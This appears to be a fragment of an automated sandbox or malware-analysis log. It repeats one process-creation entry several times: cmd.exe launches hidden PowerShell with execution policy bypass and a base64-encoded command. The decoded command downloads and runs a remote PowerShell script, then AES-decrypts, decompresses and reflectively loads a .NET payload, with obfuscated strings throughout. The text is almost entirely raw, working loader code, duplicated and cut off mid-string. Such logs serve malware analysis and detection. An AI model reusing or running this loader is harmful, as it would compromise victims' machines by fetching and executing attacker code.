mN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ